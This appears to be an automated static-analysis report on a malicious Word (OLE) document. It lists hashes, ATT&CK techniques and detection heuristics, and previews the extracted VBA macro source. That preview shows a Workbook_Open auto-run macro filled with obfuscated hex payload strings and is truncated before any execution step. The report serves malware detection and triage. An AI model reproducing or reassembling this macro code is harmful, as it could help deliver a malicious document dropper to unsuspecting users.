Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 489ec86591684b3b…

MALICIOUS

Office (OLE)

99.5 KB Created: 2018-03-20 21:14:00 Authoring application: Microsoft Office Word First seen: 2019-03-10
MD5: 65cc93cca9c3af5203351d0d1168bbaf SHA-1: ed36e4d917292d87669371caca69e515788d80f0 SHA-256: 489ec86591684b3b6c8da2addcc8bff48c0ffde1ce197eb9731010046cef6cc9
264 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains VBA macros, including a Workbook_Open auto-execution macro, which is a common technique for initiating malicious activity upon opening the document. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, suggesting the macro attempts to download and execute a second-stage payload. The presence of the 'macros.bas' artifact further supports this finding.

Heuristics 8

  • ClamAV: Xls.Malware.Cwsp-6735643-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18879 bytes
SHA-256: 4b86099ac81260752950468338c9a0f49840c3259ea0f93859f262b0ca485bf3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 70 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

Sub Workbook_Open()
Dim IV_D As String
IV_D = "4B4B31598A1F4B4B4B4B824B8B4B6F4B404B8533752F504B4B614B4B4B7F324B4B7D251D31114B152B4B3E494B514B5B4B20374B76734B4B4B1B4B4B3E5B304B54554B1B4B227B144B4B124B5B1C4B104B4B1D8828134B3C68634B4B381F4B4B4B4B4B4C4B4B4B4B4"
Dim D_DYB As String
D_DYB = "B814B216A4B434B5989494B4B4D4B4B4B7F3F814B794B24114B1F5E3D544B1F4B4B294862524B414B4A4B4B111E4B4B224B4B4B524B884B4B1C4B4B104B364B2E2F667177864B4B4B4B7C744B4B6470264B4D54854B4B4B423A4B4B4B7A2A4B4B2D124B294B1E651C"
Dim EE_MP As String
EE_MP = "544D4B4B56864B79624B4B4B41576D4B274B4B4B4B4B744B47874B4B47314B66694B83574B4B4B214B4B4B774B0D4B73833B4B4B4B454B4B724B4B4B4B4B1B711382497B6B493D4B4B4B4B4B1B314B4B4C4B4B3A4B4B4B1749334B6A4B564B616F554B8B13454B4B4"
Dim BWN_KV As String
BWN_KV = "B4B0E4B626F4B4B4B24423A814B604B1513584B494B364B4B4B69454B4B7C0F4B4B4B584B4B4B4B4D844B2B414B374B464B4B4B803D4B4B4B1D888B542B4B374B4B1324511C4B4B181783654B4B4B5B114B864B8A4B4B48484B144B3B4B65154B4B4B2D4B4B4B544B"
Dim YPY_KE As String
YPY_KE = "304B3F3A5F4B4B4B26164B4B325E5A4B14364B4B744B794B434B4B3962204B4B4B793C141A4B1D4B424B5A644B6B4B68524B870E72254B4B4B7A28702A4B4B4B4B59634B2A4B4B4B4B246B4B6F202A4B4B894B4B4F4B4B654E4B814B4B754B646C60144B4A7F4B4B6"
Dim J_B As String
J_B = "05A4B4B7F4B5B507E4B4B1E694D164B3F50662E4B794B22164B4B4B404B80124B6D4B4B4B4B5C3C47164B4B4B2A55724B854B5B4B604B4B4B754B4B81496D7D184B4B214B6D4B4B164B4B6F7C6D1A4B4B754B7B4B4B191F4215894B4B4B4B1F4B604A404B344B4B51"
Dim S_EDL As String
S_EDL = "4B89607266720F174B4B4B624B4B0D7B636D7749424B694B4B64584B4B364B7C32884B4B2E394B77183F5D4B773E5C4B4583144B4B4B4B4B4B1A4B6E1A7C3D4B62774B4B4B49814B664B3573244B26644B4B42744B4B4B4B4B4B2B1C58694B0E7821214B4B274B454"
Dim NZI_KM As String
NZI_KM = "B1B7B1F4B514B2D4B16678B4B894B4B4B4B4B4B2A70464B1E324B0F4B5E4B4B4B4B4B8B4F4B294B4B4B7F4E0D28134B247E3C2B674827394B7D0C4B554B565680D24B4B896B4B1B4B2C4B4B4B4B2B194B712E83484B4B4B8272814B344B494B14534B1E664B57844B"
Dim ZY_ZLB As String
ZY_ZLB = "474B81164B484B4B344B4B4B284B4B221C4B59794B364B6C234B5A5E4B4B4B4F4B784B684B4B364B4B0C4B4B4B544B504B4B364B7F4B4B4B7B82574B6C2B4B4B414B103C6C2C8B7E4B4B65144B37894B4B615B24654B284B178B4B4B474B4B2C4E4B4B4B604B742E4"
Dim X_D As String
X_D = "B4B644B1F504B4B4B4B4B517B4B4B614B4B4B6F354B4B5F814B4B844B4B396B775A4B4B4B464B4B824B4B4B4B4B284B4B4B634B4B4B4B4B4B3C1058494B241B7C562F4B68731B234B734B188B4B4B4B1E324B4B4B203D44774B4B364B164B4B754B443D6A534B4B25"
Dim Q_C As String
Q_C = "4B4C3F4B2C4B364B4E4B4B891B6C304B4B5D4B4B554B3E4B37824B4B4B4E4B2F834B44124B4B66604B494B604B4B186E4B7A4B43477C4B0C4B4B32554B594B4B4B384B8A4B404B6C4B8A654B4B4B4B714B6671874B127E44674B721C724B8B4B4B4B4B4B51B44B4B1"
Dim UWC_C As String
UWC_C = "34B31804B814B4B6E4B590E4B2E4B4B834B4B4B4B4B4B4B4B5A4B4B4B1A6A774B42484B4B4B284B484B19321F2E4B4B434B144B374B4B4B724B374B4B5A4B4B4B4B282A4B374B114B4B6E4B4B394B6E4B174B132526855D824B4B4B2542154B66D7334B794B414B1C"
Dim T_UXL As String
T_UXL = "0F4B564B4B4B4B4C4B404B4B0E4B4B4B0D49224B4B374B4B46753447194B4B4B70158162374B0C4B4B4B614B134B4B4B4B777A2A4B844B41634B694B4B3E4F62206A4B3B454B3E4866154B4B4B4B4D4B223D7A4B4B4B4B2C4B294B23474B1E8B4B444B6979453E574"
Dim XKM_OD As String
XKM_OD = "B0E52771A4B6F18271D4B6D4B744B244B204B4F4B234B7C4B764B524B4B484B4B4B4B751A4B3B4B0D4B4B8B6B30504B314B4B4B4C4B7E4B4B4B4B7E244B7F4B4B4A56114B4B4B4B4B4B734B710D4B4B78124066104B75274B75254B4B294B4B38127A2B4B4B56238B"
Dim RM_EY As String
RM_EY = "4B164B5F7F4D5114124B684B455E4B4B4B407D4B4B56404B444B4B4B4B874B294B134B4B724B4B4B4B224B7E4B4B284B6C47224B4B1B4B4B4B464B0D4B5F4B134A4B3D714B4B5B4B4B40153F4D4A4B3A703C604C4B84404B393532384B1D4B4B4B404B4B4B4B4B4B7"
Dim Y_SP As String
Y_SP = "D124B4F6E4B4B4B6D4B566D7B4544AC2E4B512F844B62164B4B4B4B60294B4B4B4B714C4B4B4B4D4B7A4A6D8A4B4B4B4B5A4B4B4B644B134B4B50
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.